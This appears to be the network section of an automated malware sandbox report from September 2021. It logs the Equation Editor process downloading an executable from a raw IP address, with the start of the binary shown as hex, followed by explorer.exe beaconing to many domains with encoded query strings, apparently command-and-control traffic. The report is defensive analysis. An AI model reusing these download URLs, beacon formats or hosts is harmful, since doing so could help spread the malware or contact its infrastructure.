                                                                                      Sep 15, 2021 11:16:35.638305902 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638334036 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638355970 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638359070 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638385057 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638389111 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638410091 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638422966 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638453007 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638453007 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638473034 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638483047 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638495922 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638511896 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638525009 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638540030 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638552904 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638570070 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638573885 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638602018 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638618946 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638642073 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.642138004 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749579906 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749674082 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749707937 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749742985 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749744892 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749782085 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749794006 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749798059 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749813080 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749819994 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749842882 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749859095 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749876976 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749902010 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749908924 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749911070 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749942064 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749969959 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749975920 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749977112 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750011921 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750013113 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750047922 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750050068 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750081062 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750083923 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750114918 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750117064 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750149012 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750152111 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750180006 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750183105 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750211954 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750212908 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750246048 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750247002 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750281096 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750284910 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750322104 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750323057 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750355005 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750372887 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750386953 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750403881 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750417948 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750437021 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750449896 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750453949 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750482082 CEST8049167198.23.212.143192.168.2.22

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Sep 15, 2021 11:17:59.482459068 CEST5216753192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:17:59.700364113 CEST53521678.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:04.942955017 CEST5059153192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:04.998969078 CEST53505918.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:10.148118019 CEST5780553192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:10.197412014 CEST53578058.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:20.351397038 CEST5903053192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:20.391383886 CEST53590308.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:25.528527021 CEST5918553192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:25.567326069 CEST53591858.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:30.614634991 CEST5561653192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:30.646533012 CEST53556168.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:36.949275970 CEST4997253192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:36.980983973 CEST53499728.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:41.987869978 CEST5177153192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:42.020987034 CEST53517718.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:47.027700901 CEST5986753192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:47.058543921 CEST53598678.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:19:08.294406891 CEST5031553192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:19:08.324367046 CEST53503158.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:19:13.081938982 CEST5007253192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:19:13.137840033 CEST53500728.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:19:18.277448893 CEST5430453192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:19:18.600385904 CEST53543048.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:19:28.481453896 CEST4989453192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:19:28.613152981 CEST53498948.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:19:51.494481087 CEST6464553192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:19:51.622936964 CEST53646458.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:19:54.659806013 CEST5374553192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:19:54.693376064 CEST53537458.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:19:59.824009895 CEST5435853192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:19:59.867867947 CEST53543588.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:20:04.956995964 CEST6501753192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:20:04.990484953 CEST53650178.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:21:29.345312119 CEST5834153192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:21:29.381974936 CEST53583418.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:21:34.382951021 CEST5638353192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:21:34.426151037 CEST53563838.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:21:39.423052073 CEST6217253192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:21:39.455261946 CEST53621728.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:22:17.646498919 CEST6085953192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:22:17.671439886 CEST53608598.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:23:14.544867039 CEST5905553192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:23:14.577768087 CEST53590558.8.8.8192.168.2.22

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Sep 15, 2021 11:17:59.482459068 CEST192.168.2.228.8.8.80x8eb8Standard query (0)www.americanstonesusa.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:04.942955017 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.plasticplank.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:10.148118019 CEST192.168.2.228.8.8.80xfc43Standard query (0)www.realstyleworks.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:20.351397038 CEST192.168.2.228.8.8.80x9c63Standard query (0)www.authorjameswshepherdonline.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:25.528527021 CEST192.168.2.228.8.8.80x30e0Standard query (0)www.aedenpure.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:30.614634991 CEST192.168.2.228.8.8.80x9037Standard query (0)www.requotation.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:36.949275970 CEST192.168.2.228.8.8.80xce43Standard query (0)www.mysahuarita.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:41.987869978 CEST192.168.2.228.8.8.80xb02bStandard query (0)www.renatradingbv.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:47.027700901 CEST192.168.2.228.8.8.80x43f4Standard query (0)www.oakridge-pm.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:08.294406891 CEST192.168.2.228.8.8.80xa804Standard query (0)www.oakridge-pm.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:13.081938982 CEST192.168.2.228.8.8.80x1d11Standard query (0)www.hanlansmojitovillage.netA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:18.277448893 CEST192.168.2.228.8.8.80x1f97Standard query (0)www.thaibinhgear.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:28.481453896 CEST192.168.2.228.8.8.80x1873Standard query (0)www.goldmig.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:51.494481087 CEST192.168.2.228.8.8.80x8ea6Standard query (0)www.goldmig.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:54.659806013 CEST192.168.2.228.8.8.80x6882Standard query (0)www.thaysay.netA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:59.824009895 CEST192.168.2.228.8.8.80xdd21Standard query (0)www.asoboawa.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:20:04.956995964 CEST192.168.2.228.8.8.80xc78dStandard query (0)www.onpar-golf.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:21:29.345312119 CEST192.168.2.228.8.8.80xe633Standard query (0)www.mysahuarita.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:21:34.382951021 CEST192.168.2.228.8.8.80xcdd2Standard query (0)www.renatradingbv.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:21:39.423052073 CEST192.168.2.228.8.8.80x76cfStandard query (0)www.oakridge-pm.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:22:17.646498919 CEST192.168.2.228.8.8.80x3f41Standard query (0)www.goldmig.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:23:14.544867039 CEST192.168.2.228.8.8.80x495aStandard query (0)www.tomrings.comA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Sep 15, 2021 11:17:59.700364113 CEST8.8.8.8192.168.2.220x8eb8No error (0)www.americanstonesusa.comamericanstonesusa.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:17:59.700364113 CEST8.8.8.8192.168.2.220x8eb8No error (0)americanstonesusa.com192.99.131.252A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:04.998969078 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.plasticplank.complasticplank.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:04.998969078 CEST8.8.8.8192.168.2.220xc18cNo error (0)plasticplank.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:10.197412014 CEST8.8.8.8192.168.2.220xfc43No error (0)www.realstyleworks.comrealstyleworks.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:10.197412014 CEST8.8.8.8192.168.2.220xfc43No error (0)realstyleworks.com34.98.99.30A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:20.391383886 CEST8.8.8.8192.168.2.220x9c63No error (0)www.authorjameswshepherdonline.comauthorjameswshepherdonline.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:20.391383886 CEST8.8.8.8192.168.2.220x9c63No error (0)authorjameswshepherdonline.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:25.567326069 CEST8.8.8.8192.168.2.220x30e0No error (0)www.aedenpure.com217.160.0.177A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:30.646533012 CEST8.8.8.8192.168.2.220x9037No error (0)www.requotation.comrequotation.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:30.646533012 CEST8.8.8.8192.168.2.220x9037No error (0)requotation.com184.168.131.241A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:36.980983973 CEST8.8.8.8192.168.2.220xce43Name error (3)www.mysahuarita.comnonenoneA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:42.020987034 CEST8.8.8.8192.168.2.220xb02bName error (3)www.renatradingbv.comnonenoneA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:47.058543921 CEST8.8.8.8192.168.2.220x43f4No error (0)www.oakridge-pm.comoakridge-pm.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:47.058543921 CEST8.8.8.8192.168.2.220x43f4No error (0)oakridge-pm.com184.168.131.241A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:08.324367046 CEST8.8.8.8192.168.2.220xa804No error (0)www.oakridge-pm.comoakridge-pm.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:08.324367046 CEST8.8.8.8192.168.2.220xa804No error (0)oakridge-pm.com184.168.131.241A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:13.137840033 CEST8.8.8.8192.168.2.220x1d11No error (0)www.hanlansmojitovillage.nethanlansmojitovillage.netCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:13.137840033 CEST8.8.8.8192.168.2.220x1d11No error (0)hanlansmojitovillage.net34.102.136.180A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:18.600385904 CEST8.8.8.8192.168.2.220x1f97No error (0)www.thaibinhgear.comthaibinhgear.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:18.600385904 CEST8.8.8.8192.168.2.220x1f97No error (0)thaibinhgear.com45.252.248.16A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:28.613152981 CEST8.8.8.8192.168.2.220x1873No error (0)www.goldmig.comgoldmig.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:28.613152981 CEST8.8.8.8192.168.2.220x1873No error (0)goldmig.com203.16.60.34A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:51.622936964 CEST8.8.8.8192.168.2.220x8ea6No error (0)www.goldmig.comgoldmig.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:51.622936964 CEST8.8.8.8192.168.2.220x8ea6No error (0)goldmig.com203.16.60.34A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:54.693376064 CEST8.8.8.8192.168.2.220x6882No error (0)www.thaysay.netthaysay.netCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:54.693376064 CEST8.8.8.8192.168.2.220x6882No error (0)thaysay.net34.102.136.180A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:59.867867947 CEST8.8.8.8192.168.2.220xdd21No error (0)www.asoboawa.comcname.landingi.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:59.867867947 CEST8.8.8.8192.168.2.220xdd21No error (0)cname.landingi.com52.212.68.12A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:59.867867947 CEST8.8.8.8192.168.2.220xdd21No error (0)cname.landingi.com108.128.238.226A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:59.867867947 CEST8.8.8.8192.168.2.220xdd21No error (0)cname.landingi.com54.77.19.84A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:20:04.990484953 CEST8.8.8.8192.168.2.220xc78dNo error (0)www.onpar-golf.comonpar-golf.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:20:04.990484953 CEST8.8.8.8192.168.2.220xc78dNo error (0)onpar-golf.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:21:29.381974936 CEST8.8.8.8192.168.2.220xe633Name error (3)www.mysahuarita.comnonenoneA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:21:34.426151037 CEST8.8.8.8192.168.2.220xcdd2Name error (3)www.renatradingbv.comnonenoneA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:21:39.455261946 CEST8.8.8.8192.168.2.220x76cfNo error (0)www.oakridge-pm.comoakridge-pm.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:21:39.455261946 CEST8.8.8.8192.168.2.220x76cfNo error (0)oakridge-pm.com184.168.131.241A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:22:17.671439886 CEST8.8.8.8192.168.2.220x3f41No error (0)www.goldmig.comgoldmig.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:22:17.671439886 CEST8.8.8.8192.168.2.220x3f41No error (0)goldmig.com203.16.60.34A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:23:14.577768087 CEST8.8.8.8192.168.2.220x495aNo error (0)www.tomrings.com162.0.214.58A (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • 198.23.212.143
                                                                                      • www.americanstonesusa.com
                                                                                      • www.plasticplank.com
                                                                                      • www.realstyleworks.com
                                                                                      • www.authorjameswshepherdonline.com
                                                                                      • www.hanlansmojitovillage.net
                                                                                      • www.thaysay.net
                                                                                      • www.onpar-golf.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.2249167198.23.212.14380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:16:35.291671038 CEST0OUTGET /ddr/vbc.exe HTTP/1.1
                                                                                      Accept: */*
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                      Host: 198.23.212.143
                                                                                      Connection: Keep-Alive
                                                                                      Sep 15, 2021 11:16:35.411237955 CEST1INHTTP/1.1 200 OK
                                                                                      Date: Wed, 15 Sep 2021 16:16:33 GMT
                                                                                      Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9
                                                                                      Last-Modified: Wed, 15 Sep 2021 03:32:23 GMT
                                                                                      ETag: "87e00-5cc0058a7b386"
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 556544
                                                                                      Keep-Alive: timeout=5, max=100
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-msdownload
                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f5 36 cf 82 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 08 00 00 08 00 00 00 00 00 00 ca 93 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 93 08 00 4f 00 00 00 00 a0 08 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 5c 93 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 73 08 00 00 20 00 00 00 74 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 a0 08 00 00 06 00 00 00 76 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 7c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 93 08 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 04 5f 01 00 03 00 00 00 6f 00 00 06 94 9e 01 00 c8 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7b 01 00 00 04 7d 01 00 00 04 02 03 7b 05 00 00 04 7d 05 00 00 04 02 03 7b 06 00 00 04 7d 06 00 00 04 02 03 7b 07 00 00 04 7d 07 00 00 04 2a 3a 00 02 7b 04 00 00 04 28 16 00 00 0a 00 2a 00 00 13 30 03 00 77 00 00 00 01 00 00 11 00 03 17 52 02 7b 01 00 00 04 0b 07 0a 06 2c 66 06 72 01 00 00 70 28 17 00 00 0a 2d 29 06 72 21 00 00 70 28 17 00 00 0a 2d 25 06 72 2d 00 00 70 28 17 00 00 0a 2d 25 06 72 39 00 00 70 28 17 00 00 0a 2d 25 2b 30 02 17 7d 08 00 00 04 2b 27 04 04 4a 02 7b 07 00 00 04 58 54 2b 1a 04 04 4a 02 7b 07 00 00 04 58 54 2b 0d 04 04 4a 02 7b 07 00 00 04 58 54 2b 00 2a 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 72 45 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 72 7f 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0c 00 00 00 03 00 00 11 00 19 8d 10 00 00 01 0a 2b 00 06 2a 22 02 28 15 00 00 0a 00 2a 00 00 00 13 30 02 00 26 00 00 00 04 00 00 11 00
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL60t @ @xO\ H.texts t `.rsrcv@@.reloc|@BH?_o~$}}}(*$}}}(}}*0O$}}}({}{}{}{}*:{(*0wR{,frp(-)r!p(-%r-p(-%r9p(-%+0}+'J{XT+J{XT+J{XT+*0rEp+*0rp+*0+*"(*0&


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.2249168192.99.131.25280C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:17:59.820272923 CEST585OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1
                                                                                      Host: www.americanstonesusa.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:17:59.929552078 CEST586INHTTP/1.1 301 Moved Permanently
                                                                                      Date: Wed, 15 Sep 2021 09:17:59 GMT
                                                                                      Server: Apache
                                                                                      Location: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==
                                                                                      Content-Length: 354
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
